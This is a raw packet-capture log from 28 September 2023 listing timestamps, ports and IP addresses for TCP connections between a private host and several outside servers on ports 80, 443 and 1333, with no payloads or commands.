                                                                                              Sep 28, 2023 06:01:56.955554008 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.955560923 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.955598116 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.955614090 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.955655098 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.955671072 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.955710888 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.955761909 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.955804110 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.955812931 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.955838919 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.955842972 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.955885887 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.955893993 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.955940008 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.955954075 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.956005096 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.956011057 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.956063986 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.956089973 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.956146002 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.956162930 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.956175089 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.956218004 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.956226110 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.956263065 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.956285000 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.956326962 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.956331015 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.956372976 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.956387997 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.956415892 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.956455946 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.956456900 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.956475973 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.956495047 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.956520081 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.956558943 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.956562042 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.956600904 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.956667900 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.956712008 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.956888914 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.956907034 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.956933975 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.956948042 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:56.956969976 CEST8049804157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:56.957007885 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:57.266654968 CEST4980280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:57.267079115 CEST4980780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:57.456969023 CEST804980295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:01:57.457072020 CEST4980280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:57.459440947 CEST49808443192.168.2.3149.154.167.99
                                                                                              Sep 28, 2023 06:01:57.459475040 CEST44349808149.154.167.99192.168.2.3
                                                                                              Sep 28, 2023 06:01:57.459544897 CEST49808443192.168.2.3149.154.167.99
                                                                                              Sep 28, 2023 06:01:57.463841915 CEST804980795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:01:57.463901043 CEST4980780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:57.464129925 CEST4980780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:57.471978903 CEST49808443192.168.2.3149.154.167.99
                                                                                              Sep 28, 2023 06:01:57.471993923 CEST44349808149.154.167.99192.168.2.3
                                                                                              Sep 28, 2023 06:01:57.590070009 CEST8049805178.237.33.50192.168.2.3
                                                                                              Sep 28, 2023 06:01:57.590399027 CEST4980580192.168.2.3178.237.33.50
                                                                                              Sep 28, 2023 06:01:57.660970926 CEST804980795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:01:57.664596081 CEST804980795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:01:57.664787054 CEST4980780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:57.781465054 CEST4980780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:57.782483101 CEST4980980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:57.833466053 CEST44349808149.154.167.99192.168.2.3
                                                                                              Sep 28, 2023 06:01:57.833574057 CEST49808443192.168.2.3149.154.167.99
                                                                                              Sep 28, 2023 06:01:57.920850039 CEST49808443192.168.2.3149.154.167.99
                                                                                              Sep 28, 2023 06:01:57.920877934 CEST44349808149.154.167.99192.168.2.3
                                                                                              Sep 28, 2023 06:01:57.921891928 CEST44349808149.154.167.99192.168.2.3
                                                                                              Sep 28, 2023 06:01:57.921962976 CEST49808443192.168.2.3149.154.167.99
                                                                                              Sep 28, 2023 06:01:57.923145056 CEST49808443192.168.2.3149.154.167.99
                                                                                              Sep 28, 2023 06:01:57.970442057 CEST44349808149.154.167.99192.168.2.3
                                                                                              Sep 28, 2023 06:01:57.978976965 CEST804980795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:01:57.979156017 CEST4980780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:57.987231970 CEST804980995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:01:57.987437963 CEST4980980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:57.987574100 CEST4980980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:58.167455912 CEST44349808149.154.167.99192.168.2.3
                                                                                              Sep 28, 2023 06:01:58.167489052 CEST44349808149.154.167.99192.168.2.3
                                                                                              Sep 28, 2023 06:01:58.167526007 CEST44349808149.154.167.99192.168.2.3
                                                                                              Sep 28, 2023 06:01:58.167599916 CEST44349808149.154.167.99192.168.2.3
                                                                                              Sep 28, 2023 06:01:58.167833090 CEST49808443192.168.2.3149.154.167.99
                                                                                              Sep 28, 2023 06:01:58.167833090 CEST49808443192.168.2.3149.154.167.99
                                                                                              Sep 28, 2023 06:01:58.171837091 CEST49808443192.168.2.3149.154.167.99
                                                                                              Sep 28, 2023 06:01:58.171852112 CEST44349808149.154.167.99192.168.2.3
                                                                                              Sep 28, 2023 06:01:58.175024033 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:58.192780972 CEST804980995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:01:58.198405981 CEST804980995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:01:58.198473930 CEST4980980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:58.309740067 CEST4980980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:58.310184956 CEST4981180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:58.356507063 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:58.356803894 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:58.357151031 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:58.495143890 CEST804981195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:01:58.495445013 CEST4981180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:58.495568037 CEST4981180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:58.515324116 CEST804980995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:01:58.515535116 CEST4980980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:58.538057089 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:58.680485010 CEST804981195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:01:58.685648918 CEST804981195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:01:58.686171055 CEST4981180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:58.794260025 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:58.794347048 CEST4981180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:58.794619083 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:58.794660091 CEST4981380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:58.795661926 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:58.976636887 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:58.976748943 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:58.976772070 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:58.976794004 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:58.976833105 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:58.976869106 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:58.976903915 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:58.976999998 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:58.977036953 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:58.977065086 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:58.977065086 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:58.977066040 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:58.977138996 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:58.977139950 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:58.977154970 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:58.977194071 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:58.977217913 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:58.977248907 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:58.979307890 CEST804981195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:01:58.979439974 CEST4981180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:59.000153065 CEST804981395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.000315905 CEST4981380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:59.000638962 CEST4981380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:59.158085108 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.158153057 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.158191919 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.158230066 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.158227921 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.158229113 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.158272028 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.158293009 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.158293009 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.158308983 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.158332109 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.158346891 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.158374071 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.158385038 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.158399105 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.158423901 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.158443928 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.158493996 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.158504963 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.158530951 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.158545971 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.158567905 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.158586025 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.158605099 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.158622980 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.158647060 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.158648968 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.158688068 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.158704042 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.158725977 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.158739090 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.158763885 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.158785105 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.158801079 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.158814907 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.158838034 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.158853054 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.158875942 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.158895016 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.158927917 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.205393076 CEST804981395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.209933043 CEST804981395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.210005999 CEST4981380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:59.326056004 CEST4981380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:59.326514006 CEST4981480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:59.339570999 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.339618921 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.339657068 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.339694023 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.339731932 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.339744091 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.339744091 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.339744091 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.339744091 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.339768887 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.339780092 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.339822054 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.339844942 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.339895964 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.339946032 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.339996099 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.341263056 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.341325998 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.341335058 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.341377020 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.341754913 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.341806889 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.341809988 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.341844082 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.341856003 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.341898918 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.341922045 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.341959953 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.341974974 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.342046022 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.342062950 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.342099905 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.342116117 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.342152119 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.342170000 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.342206955 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.342220068 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.342258930 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.342282057 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.342335939 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.342354059 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.342392921 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.342408895 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.342447996 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.342489958 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.342528105 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.342544079 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.342582941 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.342602968 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.342642069 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.342655897 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.342680931 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.342691898 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.342719078 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.342726946 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.342755079 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.342768908 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.342803955 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.342917919 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.342968941 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.342989922 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.343028069 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.343035936 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.343065023 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.343074083 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.343112946 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.343133926 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.343170881 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.343185902 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.343220949 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.343241930 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.343296051 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.343312979 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.343353033 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.343367100 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.343406916 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.343491077 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.343527079 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.343544960 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.343580961 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.520457983 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.520571947 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.520612955 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.520627022 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.520649910 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.520687103 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.520728111 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.520765066 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.520801067 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.520838022 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.520853996 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.520853996 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.520853996 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.520853996 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.520853996 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.520854950 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.520874977 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.520900965 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.520900965 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.520925045 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.521001101 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.521042109 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.521049023 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.521086931 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.521115065 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.521152020 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.521161079 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.521199942 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.521226883 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.521271944 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.521296978 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.521337032 CEST804981495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.521343946 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.521399975 CEST4981480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:59.521678925 CEST4981480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:59.521864891 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.521903038 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.521919966 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.521946907 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.522005081 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.522079945 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.522093058 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.522150993 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.522164106 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.522203922 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.522216082 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.522250891 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.522273064 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.522320032 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.522344112 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.522393942 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.522476912 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.522515059 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.522531033 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.522553921 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.522561073 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.522594929 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.522602081 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.522631884 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.522639990 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.522667885 CEST133349810116.202.2.169192.168.2.3
